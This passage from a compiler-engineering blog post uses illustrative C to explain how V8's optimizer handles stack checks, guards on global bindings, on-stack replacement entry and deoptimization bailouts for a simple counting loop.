Let's model that in this silly code with some global variables: Value context; // rsi Value function; // rdi Recall also that when f+g is called, it needs to check that g is actually bound to the same value. So here we go: const Value* g_cell; const Value expected_g = (Value) { 0x7f7b205d7ba1U }; Finally, f+g. I'm going to show the main path all in one go. Take a big breath! Value f_and_g (Value receiver) { // Stack slots (5 of them) Value osr_receiver, osr_unused, osr_i, osr_ret, arg_context; // Dedicated registers register int64_t i, ret; arg_context = context; // Assuming the stack grows down. if (&arg_context > root[STACK_LIMIT_IDX]) // The overflow handler knows how to inspect the stack. // It can longjmp(), or do other things. handle_overflow (); i = 0; ret = 0; restart_after_osr: if (*g_cell != expected_g) goto deoptimize_1; while (i < 10000000) { register uint64_t tmp = ret + 1; if ((int64_t)tmp < 0) goto deoptimize_2; i++; ret = tmp; } return val_from_smi (ret); And exhale. The receiver object is passed as an argument. There are five stack slots, none of which are really used in the main path. Two locals are allocated in registers: i and ret, as we mentioned before. There's the stack check, locals initialization, the check for g, and then the loop, and the return. The test in the loop is intended to be a jump-on-overflow check. restart_after_osr what? But what about OSR, and what's that label about? What happens is that when f+g is replaced on the stack, the computation needs to restart. It does so from the osr_after_inlining_g label: osr_after_inlining_g: if (val_is_smi (osr_i)) i = val_to_smi (osr_i); else { if (!obj_is_double (osr_i)) goto deoptimize_3; double d = obj_to_double (val_to_obj (osr_i)); i = (int64_t)trunc (d); if ((double) i != d || isnan (d)) goto deoptimize_3; } Here we take the value for the loop counter, as stored on the stack by OSR, and unpack it so that it is stored in the right register. Unpacking a SMI into an integer register is simple. On the other hand unpacking a heap number has to check that the number has an integer value. I tried to represent that here with the C code. The actual assembly is just as hairy but a bit more compact; see the article for the full assembly listing. The same thing happens for the other value that was live at OSR time, ret: if (val_is_smi (osr_ret)) ret = val_to_smi (osr_ret); else { if (!obj_is_double (osr_ret)) goto deoptimize_4; double d = obj_to_double (val_to_obj (osr_ret)); ret = (int64_t)trunc (d); if ((double) ret != d || isnan (d)) goto deoptimize_4; if (ret == 0 && signbit (d)) goto deoptimize_4; } goto restart_after_osr; Here we see the same thing, except that additionally there is a check for -0.0 at the end, because V8 could not prove to itself that ret would not be -0.0. But if all succeeded, we jump back to the restart_after_osr case, and the loop proceeds. Finally we can imagine some deoptimization bailouts, which would result in OSR, but for deoptimization instead of optimization. They are implemented as tail calls (jumps), so we can't represent them properly in C. deoptimize_1: return deopt_1 (); deoptimize_2: return deopt_2 (); deoptimize_3: return deopt_3 (); deoptimize_4: return deopt_4 (); } and that's that. I think I've gnawed all the meat that's to be had off of this bone, so hopefully that's the last we'll see of this silly loop. Comments and corrections very much welcome. Next up will probably be a discussion of how V8's optimizer works. Happy hacking. Syndicated 2011-06-20 13:14:03 from wingolog
http://www.advogato.org/person/wingo/diary.html?start=366
CC-MAIN-2016-07
refinedweb
1,461
63.49
LinkWell LinkWell is Text Plugin that detects URLs and Emails in a String and when tapped opens in user browsers, linkwell ScreenShots Usage Basic: import 'package:linkwell/linkwell.dart'; LinkWell( "Hi here's my email: samuelezedi@gmail.com and website:" ); Add Styling To add style to links LinkWell( "Hi here's my email: samuelezedi@gmail.com and website:", linkStyle: TextStyle(color: Colors.blue,fontSize: 17) ); To add style to non links LinkWell( "Hi here's my email: samuelezedi@gmail.com and website:", style: TextStyle(color: Colors.black,fontSize: 17) ); Naming Links If you would like to name the links LinkWell( "By registering you agree to our samuelezedi.com/terms and samuelezedi.com/privacy", listOfNames: { 'samuelezedi.com/terms' : 'Terms', 'samuelezedi.com/privacy' : 'Privacy Policy' }, ); Why I made this plugin I was building a chat application and I needed to detect when users posted links and emails so I went online and found a couple plugin but then, only one fit the need, I imported it and discovered that it could not detect emails and long urls correctly and I could not name URLs or emails, So I built LinkWell. I hope this is what you are looking for and it solves your link problems. Kindly follow me on Libraries - linkwell - LinkWell is Text Plugin that detects URLs and Emails in a String and when tapped opens in user browsers, I invite you to clone, star and make contributions to this project, Thanks. Copyright 2020. All rights reserved. Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.
https://pub.dev/documentation/linkwell_mirror/latest/
CC-MAIN-2022-33
refinedweb
266
72.26
In this article, we'll show you how to get started with Domino in less than 10 minutes! We'll use some data about the demographics of New York City. Step 1 Download this CSV file and this Python script, mean_pop.py, which calculates mean statistics for whatever column you choose in the CSV file. Step 2 Next, create a new project and upload these files to Domino. Step 3 Now that you have these files in Domino, go to the "Runs" tab and start a new run using mean_pop.py. Use the command-line argument "PERCENT FEMALE" to calculate the mean value for that column. mean_pop.py "PERCENT FEMALE" The result is an average of 24% female in each zipcode. That's unexpectedly low, so let's dig deeper in an interactive Jupyter session. Step 4 Copy/paste these lines of code to follow along with the video below: import pandas as pd df = pd.read_csv('Demographic_Statistics_By_Zip_Code.csv') df[['COUNT FEMALE']].mean() df[['COUNT MALE']].mean() This says that on average they sampled 7 women and 10 men in each zipcode. That's a pretty small sample relative to the size of New York City, so we can't trust the 24% women we found in step 3. We need to find a different data set. Don't forget to name and save your Jupyter session! When you hit "Stop", we'll sync the results back to Domino. Then it's back to the drawing board to find a decent data set. Ahh ... the life of a data scientist! Step 5 You can review the results in the Runs dashboard, and even leave a comment to remind your future self why you didn't use this data set.
https://support.dominodatalab.com/hc/en-us/articles/360000102283-Domino-the-first-10-minutes
CC-MAIN-2018-26
refinedweb
289
74.79
Investors considering a purchase of Cognex Corp. (Symbol: CGNX) stock, but tentative about paying the going market price of $33.77/share, might benefit from considering selling puts among the alternative strategies at their disposal. One interesting put contract in particular, is the May 2016 put at the $30 strike, which has a bid at the time of this writing of $2.05. Collecting that bid as the premium represents a 6.8% return against the $30 commitment, or a 10.4% annualized rate of return (at Stock Options Channel we call this the YieldBoost ). Selling a put does not give an investor access to CGNX Cognex Corp. sees its shares fall 11.2% and the contract is exercised (resulting in a cost basis of $27.95 per share before broker commissions, subtracting the $2.05 from $30), the only upside to the put seller is from collecting that premium for the 10.4% annualized rate of return. Interestingly, that annualized 10.4% figure actually exceeds the 0.8% annualized dividend paid by Cognex Corp. by 9.6%, based on the current share price of $33.77. And yet, if an investor was to buy the stock at the going market price in order to collect the dividend, there is greater downside because the stock would have to lose 11.19% to reach the $30 strike price. Always important when discussing dividends is the fact that, in general, dividend amounts are not always predictable and tend to follow the ups and downs of profitability at each company. In the case of Cognex Corp., looking at the dividend history chart for CGNX below can help in judging whether the most recent dividend is likely to continue, and in turn whether it is a reasonable expectation to expect a 0.8% annualized dividend yield. Below is a chart showing the trailing twelve month trading history for Cognex Corp., and highlighting in green where the $30 strike is located relative to that history: The chart above, and the stock's historical volatility, can be a helpful guide in combination with fundamental analysis to judge whether selling the May 2016 put at the $30 strike for the 10.4% annualized rate of return represents good reward for the risks. We calculate the trailing twelve month volatility for Cognex Corp. (considering the last 252 trading day closing values as well as today's price of $33.77) to be 39%. For other put options contract ideas at the various different available expirations, visit the CGNX Stock Options page of StockOptionsChannel.com. In mid-afternoon trading on Thursday, the put volume among S&P 500 components was 1.00M contracts, with call volume at 954,458, for a put:call ratio of 1.05.
https://www.nasdaq.com/articles/commit-buy-cognex-corp-30-earn-104-annualized-using-options-2015-09-24
CC-MAIN-2021-49
refinedweb
458
66.23
Hook and simulate keyboard events on Windows and Linux Project description Take full control of your keyboard with this small Python library. Hook global events, register hotkeys, simulate key presses and much more. - Global event hook (captures keys regardless of focus). - Simulates key presses. - Complex hotkey support (e.g. Ctrl+Shift+A followed by Alt+Space) with controllable timeout. - Maps keys as they actually are in your layout, with full internationalization support (‘Ctrl+ç’). - Events automatically captured in separate thread, doesn’t block main program. - Pure Python, no C modules to be compiled. - Zero dependencies. Trivial to install and deploy. - Works with Windows and Linux (if you have a Mac, pull requests are welcome). - Python 2 and Python 3. - Tested and documented. - Doesn’t break accented dead keys (I’m looking at you, pyHook) - Mouse support coming soon. Example: import keyboard # Press PAGE UP then PAGE DOWN to type "foobar". keyboard.add_hotkey('page up, page down', lambda: keyboard.write('foobar')) # Blocks until you press esc. wait('esc') This program makes no attempt to hide itself, so don’t use it for keyloggers. Project details Release history Release notifications Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/keyboard/0.6.5/
CC-MAIN-2020-10
refinedweb
209
61.63
Description. libvault alternatives and similar packages Based on the "Third Party APIs" category. Alternatively, view libvault alternatives based on common mentions on social networks and blogs. stripity_stripe9.5 7.0 libvault VS stripity_stripeAn Elixir Library for Stripe slack9.3 0.3 libvault VS slackSlack real time messaging and web API client in Elixir google-cloud9.3 9.9 libvault VS google-cloudElixir client libraries for accessing Google APIs. tentacat9.1 1.2 libvault VS tentacatSimple Elixir wrapper for the GitHub API pigeon9.1 5.7 libvault VS pigeoniOS and Android push notifications for Elixir gringotts8.9 0.0 libvault VS gringottsA complete payment library for Elixir and Phoenix Framework extwitter8.9 4.9 libvault VS extwitterTwitter client library for elixir. ex_twilio8.8 4.3 libvault VS ex_twilioTwilio API client for Elixir nadia8.8 1.6 libvault VS nadiaTelegram Bot API Wrapper written in Elixir ethereumex8.4 4.1 libvault VS ethereumexElixir JSON-RPC client for the Ethereum blockchain mailgun8.3 0.0 libvault VS mailgunElixir Mailgun Client statix8.3 0.0 libvault VS statixFast and reliable Elixir client for StatsD-compatible servers - 7.8 0.0 libvault VS facebookFacebook Graph API Wrapper written in Elixir MongoosePush7.7 0.0 libvault VS MongoosePushMongoosePush is a simple Elixir RESTful service allowing to send push notification via FCM and/or APNS. commerce_billing7.7 0.0 libvault VS commerce_billingA payment processing library for Elixir ex_statsd7.4 0.0 libvault VS ex_statsdA statsd client implementation for Elixir. spotify_ex7.3 3.4 libvault VS spotify_exElixir wrapper for the Spotify Web API Execjs7.2 0.0 libvault VS ExecjsRun JavaScript code from Elixir shopify7.1 0.0 libvault VS shopifyEasily access the Shopify API with Elixir. kane7.0 0.0 libvault VS kaneGoogle Pub/Sub client for Elixir sendgrid7.0 0.1 libvault VS sendgridCreate and send composable emails with Elixir and SendGrid. lob_elixir6.9 3.0 libvault VS lob_elixirElixir Library for Lob API apns6.7 0.0 libvault VS apnsAPNS for Elixir mailchimp6.7 1.2 libvault VS mailchimpA basic Elixir wrapper for version 3 of the MailChimp API sparkpost6.7 0.0 libvault VS sparkpostSparkPost client library for Elixir diplomat6.6 0.0 libvault VS diplomatElixir library for interacting with Google's Cloud Datastore m2x6.6 0.0 libvault VS m2xAT&T M2X Elixir Library elixtagram6.5 0.0 libvault VS elixtagram:camera: Instagram API client for the Elixir language (elixir-lang) forcex6.5 0.0 libvault VS forcexElixir library for the Force.com / Salesforce / SFDC REST API Stripe6.4 0.0 libvault VS StripeStripe API client for Elixir airbrakex6.4 0.0 libvault VS airbrakexElixir client for the Airbrake service. qiniu6.3 0.0 libvault VS qiniuQiniu sdk for Elixir google_sheets6.1 0.0 libvault VS google_sheetsElixir library for fetching Google Spreadsheet data in CSV format dnsimple5.9 5.2 libvault VS dnsimpleThe DNSimple API client for Elixir. instrumental5.6 0.0 libvault VS instrumentalAn Elixir client for Instrumental amazon_product_advertising_clientAn Amazon Product Advertising API client for Elixir bitpay5.4 0.0 libvault VS bitpayElixir core library for connecting to bitpay.com ex_gecko5.4 7.8 libvault VS ex_geckoElixir SDK to communicate with Geckoboard's API. cashier5.4 0.0 libvault VS cashierCashier is an Elixir library that aims to be an easy to use payment gateway, whilst offering the fault tolerance and scalability benefits of being built on top of Erlang/OTP mandrill5.4 0.0 libvault VS mandrilla Mandrill wrapper for Elixir pay_pal5.3 0.0 libvault VS pay_pal:money_with_wings: PayPal REST API client for the Elixir language (elixir-lang) riemann5.2 0.0 libvault VS riemannA Riemann client for Elixir, surprise! keenex5.1 0.0 libvault VS keenexKeen.io API Client for Elixir Stripy5.0 0.1 libvault VS StripyMicro wrapper for Stripe's REST API. ExTrello4.9 0.0 libvault VS ExTrelloAn Elixir library for interfacing with the Trello API dogstatsd4.9 0.0 libvault VS dogstatsdAn Elixir client for DogStatsd airbrake4.8 1.0 libvault VS airbrakeAn Elixir notifier to the Airbrake/Errbit. System-wide error reporting enriched with the information from Plug and Phoenix channels. telegex4.8 1.7 libvault VS telegexTelegram bot library for Elixir pusher4.8 0.0 libvault VS pusherElixir library to access the Pusher REST API. elixir_ipfs_api4.6 0.0 libvault VS elixir_ipfs_apiThe Elixir library that is used to communicate with the IPFS REST endpoint. Do you think we are missing an alternative of libvault or a related project? README libvault. API Preview {:ok, vault } = Vault.new([ engine: Vault.Engine.KVV2, auth: Vault.Auth.UserPass ]) |> Vault.auth(%{username: "username", password: "password"}) {:ok, db_pass} = Vault.read(vault, "secret/path/to/password") {:ok, %{"version" => 1 }} = Vault.write(vault, "secret/path/to/creds", %{secret: "secrets!"}) Configuration / Adapters Hashicorp's Vault is highly configurable. Rather than cover every possible option, this library strives to be flexible and adaptable. Auth backends, Secret Engines, and HTTP clients are all replaceable, and each behaviour asks for a minimal contract. HTTP Adapters The following HTTP Adapters are provided: Be sure to add applications and dependencies to your mix file as needed. JSON Adapters Most JSON libraries provide the same methods, so no default adapter is needed. You can use Jason, JSX, Poison, or whatever encoder you want. Defaults to Jason or Poison if present. See Vault.JSON.Adapter for the full behaviour interface. Auth Adapters Adapters have been provided for the following auth backends: - AppRole with Vault.Auth.Approle - Azure with Vault.Auth.Azure - GitHub with Vault.Auth.Github - GoogleCloud with with Vault.Auth.GoogleCloud - JWT with Vault.Auth.JWT - Kubernetes with Vault.Auth.Kubernetes - LDAP with Vault.Auth.LDAP - UserPass with Vault.Auth.UserPass - Token with Vault.Auth.Token In addition to the above, a generic backend is also provided ( Vault.Auth.Generic). If support for auth provider is missing, you can still get up and running quickly, without writing a new adapter. Secret Engine Adapters Most of Vault's Secret Engines use a replacable API. The Vault.Engine.Generic adapter should handle most use cases for secret fetching. Vault's KV version 2 broke away from the standard REST convention. So KV has been given its own adapter: Additional request methods The core library only handles the basics around secret fetching. If you need to access additional API endpoints, this library also provides a Vault.request method. This should allow you to tap into the complete vault REST API, while still benefiting from token control, JSON parsing, and other HTTP client nicities. Installation and Usage Installation Ensure that any adapter dependencies have been included as part of your application's dependencies: def deps do [ {:libvault, "~> 0.2.0"}, # tesla, required for Vault.HTTP.Tesla {:tesla, "~> 1.3.0"}, # pick your HTTP client - Mint, iBrowse or hackney {:mint, "~> 0.4.0"}, {:castore, "~> 0.1.0"}, # Pick your json parser - Jason or Poison {:jason, ">= 1.0.0"} ] end Usage vault = Vault.new([ engine: Vault.Engine.KVV2, auth: Vault.Auth.UserPass, json: Jason, credentials: %{username: "username", password: "password"} ]) |> Vault.auth() {:ok, db_pass} = Vault.read(vault, "secret/path/to/password") {:ok, %{"version" => 1 }} = Vault.write(vault, "secret/path/to/creds", %{secret: "secrets!"}) You can configure the vault client up front, or change configuration on the fly. vault = Vault.new() |> Vault.set_auth(Vault.Auth.Approle) |> Vault.set_engine(Vault.Engine.Generic) |> Vault.auth(%{role_id: "role_id", secret_id: "secret_id"}) {:ok, db_pass} = Vault.read(vault, "secret/path/to/password") vault = Vault.set_engine(Vault.Engine.KVV2) // switch to versioned secrets {:ok, db_pass} = Vault.write(vault, "kv/path/to/password", %{ password: "db_pass" }) See the full Vault client for additional methods. Testing Locally When possible, tests run against a local vault instance. Otherwise, tests run against the Vault Spec, using bypass to test to confirm the success case, and follows vault patterns for failure. Install the Vault Go CLI In the current directory, set up a local dev server with sh scripts/setup-local-vault Vault (at this time) can't be run in the background without a docker instance. For now, set up the local secret engine paths with sh scripts/setup-engines.sh Documentation can be generated with ExDoc and published on HexDocs. Once published, the docs can be found at.
https://elixir.libhunt.com/libvault-alternatives
CC-MAIN-2021-43
refinedweb
1,350
61.12
Help Please- on design approach for data collection across n/w Sathvathsan Sampath Ranch Hand Joined: Oct 03, 2000 Posts: 96 posted May 10, 2001 02:50:00 0 hello ppl, Could you ppl please comment on my approach. I would be very grateful for comments/criticism/help etc. Task description: As part of billing data collection, I need to extract data from flat files across the network from different machines (both NT and Solaris). The flat file data on the different machines are in different formats and therefore I need to parse each of them individually to extract the data in a pre-defined format and collate them into a single file. This large flat file then eventually needs to be uploaded onto another machine. This task must be scheduled to run on a daily basis at a particular time. Please note that all the clients/machines are within the firewall - they are on local n/w. Also, the pre-defined format is not expected to change for a fairly long duration. And, the number of clients is 3 and is not expected to increase beyond 5 over a long duration. My proposed approach : STEP 1: As a first task I gather the flat files in different formats distributed across the network to a temporary working folder on my server (Solaris). I could think of 2 possible soln here: - (a) run platform-specific scripts on individual machines containing the flat files that would ftp it to the Solaris box. On NT box, I would use the Task scheduler to do this. And on other Unix box I would use a cron job to do the same. -(b) Alternatively, to access the clients file system, write a server process listening to a specific port and run client process on every machine that would transfer these files by establishing a socket connection. This would mean I need to have or install jvms on all the clients as I intend to write only using java . I would once again write some scripts to schedule it run on a daily basis. Basically, the question is a java based appln based on socket instead of using FTP. - Or use RMI - maybe an overkill here. And besides, I am not familiar with it. I am inclined choose the option (a) coz it can be implemented quickly. Does anyone have a better idea than these & also please comment on the approach. Thanks in advance, ------------------ - Sathvathsan Sampath - Sathvathsan Sampath Cindy Glass "The Hood" Sheriff Joined: Sep 29, 2000 Posts: 8521 posted May 11, 2001 06:46:00 0 Why don't you use the UrlConnection class to connect to the remote server and communicate with it directly inside your java program? <font size=2.5> import java.io.*; import java.net.*; public class FtpTest { public static void main(String[] args) throws Exception { FtpFile accounts = new ftpFile(" : password@hostname/filename"); } } class FtpFile { public FtpFile( String url) throws Exception { URL site = new URL(url); URLConnection siteCon = site.openConnection(); siteCon.setDoInput(true); siteCon.connect(); BufferedReader in = new BufferedReader(new InputStreamReader(siteCon.getInputStream())); String inputLine; while((inputLine = in.readLine()) != null){ System.out.println(inputLine); } in.close(); } } "JavaRanch, where the deer and the Certified play" - David O'Meara I agree. Here's the link: subject: Help Please- on design approach for data collection across n/w Similar Threads SSH-FTP using J2SSH api - Authentication issue! FTP using java Searching and Updating a CSV file help me out Timing events in a servlet All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter JForum | Paul Wheaton
http://www.coderanch.com/t/322340/java/java/design-approach-data-collection
CC-MAIN-2014-41
refinedweb
597
60.45
"Rogue 9" <rogue9 at ntlworld.com> wrote in message news:ydFpa.15$IO5.10324 at newsfep2-gui.server.ntli.net... > Hi all, > I'm new to both programming and Python in particular and have run in to a > snag while trying to write my own program.I have looked through books and > the web but haven't as yet found an answer so I though I might try a post > here to see if anyone could point me in the right direction. > Okay my program is for analysing a Lottery Draw results text file I have > pre-formatted so that each line contains 7 comma separated values (Draw > number and six values representing the numbers drawn in numerically > ascending order. > I've sussed out how to open the file read in the lines and I have split > the strings first by the '\n' newline symbol and then I have split it > again by ','.I've also turned the values back into integers as they were > strings.Now what I've ended up with is a list containing one draw result > for each week (768 at the last count)as individual items in that list e.g > list =[[767,11,22,33,44,45,46]......[1,20,33,41,45,46,47]] > What I really want is a list or dictionary for each individual weeks > result but I can't seem to work out how to dynamically create a list or > dict with a unique name for each week. You've already got a list for each week. Since I don't know where you're going with this (that is, I don't know what you mean by "analyze") I can't give you more specific answers. So I'm going to assume that what you want is to be able to find the results by week number. The following (untested) code should give you an idea. biglist.sort() # turn the list around so week 1 is at the front. aWeek = biglist[week-1][1:] # gives you a list of the six result numbers for the week. > The results file will grow and I > don't fancy creating 768+ lines of code just to instantiate a list or > dict.At first I tried looping a variable equal to the length of the file > as in: > x=len(filelength) > 'draw'+str(x)=[drawresult] > I thought this would dynamically make a whole bunch of lists such as > draw1,draw2 etc. but all I got was errors. Unfortunately, you can't do that. There is a way to add names to a namespace in Python, but it's not what you want. If you want to create a name for each list, you need a dict. The following (untested) code will build a dict with a name for each week of the lottery, and with the six numbers as a list. weekDict = {} # create a dictionary for weeksNumbers in biglist: # biglist is the list you built on your input weekDict["draw" + str(weeksNumbers[0])] = weeksNumbers[1:] # notice the way it slices the week! The keys in weekDict will now be "draw1", "draw2" and so forth, assuming your input list is the one you mentioned before. > I hope I have explained my 'problem' sufficiently for someone to help or > to at least point me in the right direction to work towards a solution. > Yours hopefully, > Rogue9 HTH John Roth
https://mail.python.org/pipermail/python-list/2003-April/197071.html
CC-MAIN-2016-40
refinedweb
564
78.48
On 06-Nov-02, 15:54 (CST), Eric Richardson <eric.richardson@milagrosoft.com> wrote: > /etc/modules * > /etc/modules.conf * > > * required and necessary as part of the operating kernel but no versions > to separate differences between versions of kernels since modules are an > essential part of the kernel. But in general, you don't *need* version specific modules{.conf}. I've had the same modulues.conf stuff for years. As I change hardware, I change the configuration. I typically add stuff, not remove it, as having "extras" doesn't cause a problem. And if I *do* need a version specific option, I simply use the tools that the modules.conf 'language' already provides. > Proposal to support different module files loaded for different kernel > versions. I guess I don't see what this buys you that isn't already provided by the if-then-elseif-else-endif construct and the include command. In fact, it seems like a step backwards, because I know have to maintain seperate files for each version, rather than being able to group things the way they are actually used. As for /etc/modules, again, I don't see that it is particularly version dependent. If you have some kernel versions with more modules than others, *and* they must be loaded at boot time (rather than 'on-demand' through modules.conf), then simply add them to /etc/modules. If they exist, they get loaded. If not, they don't. What's the problem? (As a side note, I guess I've always figured that if it's vital enough to be in /etc/modules, why is it modularized in the first place? Yes, for distribution kernels, sure, but once you start building you're own, then why bother?) > That's about it. Hopefully this gives a clearer picture of what I'm > talking about. Apparently not, as I still don't see what problem you have that isn't solved by the existing tools. Steve -- Steve Greenland The irony is that Bill Gates claims to be making a stable operating system and Linus Torvalds claims to be trying to take over the world. -- seen on the net
https://lists.debian.org/debian-devel/2002/11/msg00396.html
CC-MAIN-2015-40
refinedweb
359
67.35
Using Memcache Memcache is one of the App Engine services. It is a volatile-memory key-value store. It operates over all your JVM instances; as long as an item remains in Memcache, it can be accessed by any of your application’s processes. Memcache contents remain indefinitely if you don’t set them to expire, but can be removed (“evicted”) by App Engine at any time. So, never count on a Memcache entry to exist in order for your application to work correctly. The service is meant only as a cache that allows you quicker access to information that you would otherwise obtain from the Datastore or have to generate. Memcache is often used both for storing copies of data objects and for storing relatively static display information, allowing web pages to be built more quickly. Transactions over Memcache operations are not supported—any Memcache changes you make within a transaction are not undone if the transaction is rolled back. The basic Memcache operations are put, get, and delete: put stores an object in the cache indexed by a key; get accesses an object based on its cache key; and delete removes the object stored at a given cache key. A Memcache put is atomic—the entire object will be stored properly or not at all. Memcache also has the ability to perform increments and decrements of cache values as atomic operations. Objects must be serializable in order to be stored in Memcache. At the time of writing, Memcache has a 1MB size limit on a given cached value, and data transfer to/from Memcache counts towards an app quota (we further discuss quotas in Chapter 11). Memcache has two features that can be particularly useful in organizing your cached data—the ability to define cache namespaces and the ability to define when a cache entry expires. We’ll use these features in Connectr. App Engine supports two different ways to access Memcache—via an implementation of the JCache APior via an App Engine Java API. JCache is a (notyet- official) proposed interface standard, JSR 107. The Connectr app will use the App Engine’s Memcache API, which exposes a bit more of its functionality. This page and its related links have more information on uses for Memcache: scaling/memcache.html. For more information on JCache , see detail?id=107and docs/java/memcache/usingjcache.html. Using the App Engine Memcache Java APiin Connectr To access the Memcache service in Connectr, we will use the com.google. appengine.api.memcache package ( java/javadoc/com/google/appengine/api/memcache/package-summary.html). To facilitate this, we’ll build a “wrapper” class, server.utils.cache.CacheSupport, which does some management of Memcache namespaces, expiration times, and exception handling. The code for the server.utils.cache.CacheSupport class is as follows: import com.google.appengine.api.memcache.Expiration; import com.google.appengine.api.memcache.MemcacheService; import com.google.appengine.api.memcache.MemcacheServiceException; import com.google.appengine.api.memcache.MemcacheServiceFactory; public class CacheSupport { private sta tic MemcacheService cacheInit(String nameSpace){ MemcacheService memcache = MemcacheServiceFactory.getMemcacheService(nameSpace); return memcache; } public static Object cacheGet(String nameSpace, Object id){ Object r = null; MemcacheService memcache = cacheInit(nameSpace); try { r = memcache.get(id); } catch (MemcacheServiceException e) { // nothing can be done. } return r; } public static void cacheDelete(String namespace, Object id){ MemcacheService memcache = cacheInit(nameSpace); memcache.delete(id); } public static void cachePutExp(String nameSpace, Object id, Serializable o, int exp) { MemcacheService memcache = cacheInit(nameSpace); try { if (exp>0) { memcache.put(id, o, Expiration.byDeltaSeconds(exp)); } else { memcache.put(id, o); } } catch (MemcacheServiceException e) { // nothing can be done. } } public static void cachePut(String nameSpace, Object id, Serializable o){ cachePutExp(nameSpace, id, o, 0); } } As seen in the cacheInit method, to use the cache, first obtain a handle to the Memcache service via the MemcacheServiceFactory, optionally setting the namespace to be used: MemcacheService memcache = MemcacheServiceFactory.getMemcacheService(nameSpace); Memcache namespaces allow you to partition the cache. If the namespace is not specified, or if it is reset to null, a default namespace is used. Namespaces can be useful for organizing your cached objects. For example (to peek ahead to the next section), when storing copies of JDO data objects, we’ll use the classname as the namespace. In this way, we can always use an object’s app-assigned String ID or system-assigned Long ID as the key without concern for key clashes. You can reset the namespace accessed by the Memcache handle at any time by calling: memcache.setNamespace(nameSpace); Once set for a Memcache handle, the given namespace is used for the Memcache APicalls. Therefore, any subsequent gets, puts, or deletes via that handle will access that namespace. As this book goes to press, a new Namespace APiis now part of App Engine. The Namespace API supports multitenancy, allowing one app to serve multiple "tenants" or client organizations via the use of multiple namespaces to separate tenant data. A number of App Engine service APIs, including the Datastore and Memcache, are now namespace-aware, and a namespace may be set using a new Namespace Manager. The getMemcacheService() method used in this chapter, if set with a namespace, will override the more general settings of the Namespace Manager. So, for the most part, you do not want to use these two techniques together—that is, if you use the new Namespace APito implement multitenancy, do not additionally explicitly set Memcache namespaces as described in this chapter. Instead, leave it to the Namespace Manager to determine the broader namespace that you are using, and ensure that your cache keys are unique in a given "tenant" context. docs/java/multitenancy/overview.html provides more information about multitenancy. To store an object in Memcache, call: memcache.put(key, value); where memcache is the handle to the Memcache service, and both the key and the value may be objects of any type. The value object must be serializable. The put method may take a third argument, which specifies when the cache entry expires. See the documentation for more information on the different ways in which expiration values can be specified. To retrieve an object with a given key from Memcache, call: Object r = memcache.get(key); where again memcache is the handle to the Memcache service. If the object is not found, get will return null. To delete an object with a given key from Memcache, call: memcache.delete(key); If these operations encounter a Memcache service error, they may throw a MemcacheServiceException. It is usually a good idea to just catch any Memcachegenerated errors. Thus, the cacheGet , cacheDelete , and cachePut /cachePutExp method s of CacheSupport create a namespace-specific handler based on their namespace argument, perform the specified operation in the context of that namespace, and catch any MemcacheServiceExceptions thrown. The cachePutExp method takes an expiration time, in seconds, and sets the cached object to expire accordingly. CacheSupport requires the cache value argument to implement Serializable (if the wrapper class had not imposed that requirement, a put error would be thrown if the value were not Serializable). Memcache error handlers The default error handler for the Memcache service is the LogAndContinueErrorHandler, which just logs service errors instead of throwing them. The resu lt is that service errors act like cache misses. So if you use the default error handler, MemcacheServiceException will in fact not be thrown. However, it is possible to set your own error handler, or to use the StrictErrorHandler, which will throw a MemcacheServiceException for any serv ice error. See the com.google.appengine.api.memcache documentation (. com/appengine/docs/java/javadoc/com/google/appengine/api/memcache/ package-summary.html) for more information. Memcache statistics It is possible to access statistics on Memcache use. Using the com.google. appengine.api.memcache API, you can get information about things such as the number of cache hits and misses, the number and size of the items currently in the cache, the age of the least-recently accessed cache item, and the total size of data returned from the cache. The statistics are gathered over the service’s current uptime (and you can not explicitly reset them), but they can be useful for local analysis and relative comparisons. Atomic increment/decrement of Memcache values Using the com.google.appengine.api.memcache API, it is possible to perform atomic increments and decrements on cache values. That is, the read of the value, its modification, and the storage of the new value can be performed atomically, so that no other process may update the value between the time it is read and the time it is updated. Because Memcache operations cannot be a part of regular transactions, this can be a useful feature. For example, it can allow the implementation of short-term volatile-memory locks. Just remember that the items in the cache can be evicted by the system at any time, so you should not depend upon any Memcache content for the correct operation of your app. The atomic increments and decrements are performed using the variants of the increment() and incrementAll() method s of MemcacheService. You specify the delta by which to increment and can perform a decrement by passing a negative delta. See the com.google.appengine.api.memcache documentation for more information. Using Memcache with JDO data objects One common use of the Memcache service is to cache copies of persistent data objects in volatile memory so that you don’t always have to make a more timeconsuming Datastore fetch to access them: you can check the cache for the object first, and only if you have a cache miss do you need to access the Datastore. Objects must be serializable in order to be stored in Memcache, so any such cached data classes must implement Serializable. When storing a JDO object in Memcache, you are essentially storing a detached copy, so be sure to prefetch any lazily loaded fields that you want to include in the cached object before storing it. When using Memcache to cache data objects, be aware that there is no way to guarantee that related Memcache and Datastore operations always happen together—you can’t perform the Memcache operations under transactional control, and a Memcache access might transiently fail (this is not common, but is possible), leaving you with stale cached data. Thus, it is not impossible for a Memcache object to get out of sync with its Datastore counterpart. Typically, the speedup benefits of using Memcache far outweigh such disadvantages. However, you may want to give all of your cached objects an expiration date. This helps the cache “re-sync” after a period of time if there are any inconsistencies. The pattern of cache usage for data objects is typically as follows, depending upon whether or not an object is being accessed in a transaction. - Within a transaction When accessing an object from within a transaction, you should not use the cached version of that object, nor update the cache inside the transaction. This is because Memcache is not under transactional control. If you were to update the cache within a transactional block, and then the transaction failed to commit, the Memcache data would be inconsistent with the Datastore. So when you access objects inside a transaction, purge the cache of these objects. Post-transaction, you can cache a detached copy of such an object, once you have determined that the commit was successful. - Outside a transaction If a Datastore access is not under transactional control, this means that it is not problematic to have multiple processes accessing that object at the same time. In that case, you can use Memcache as follows: When reading an object: first check to see if the object is in the cache; if not, then fetch it from the Datastore and add it to the cache. When creating or modifying an object: save it to the Datastore first, then update the cache if the Datastore operation was successful. When deleting an object: delete from the cache first, then dele t e from the Datastore. In all cases, be sure to catch any errors thrown by the Memcache service so that they do not prevent you from doing your other work. When using Memcache to store data objects, it can be useful to employ some form of caching framework, so that you do not have to add object cache management code for every individual method and access. In the next section, we will look at one way to do this—using capabilities provided by JDO. Speak Your Mind
http://www.javabeat.net/google-app-engine-java-and-gwt-application-development/3/
CC-MAIN-2015-18
refinedweb
2,086
53.31
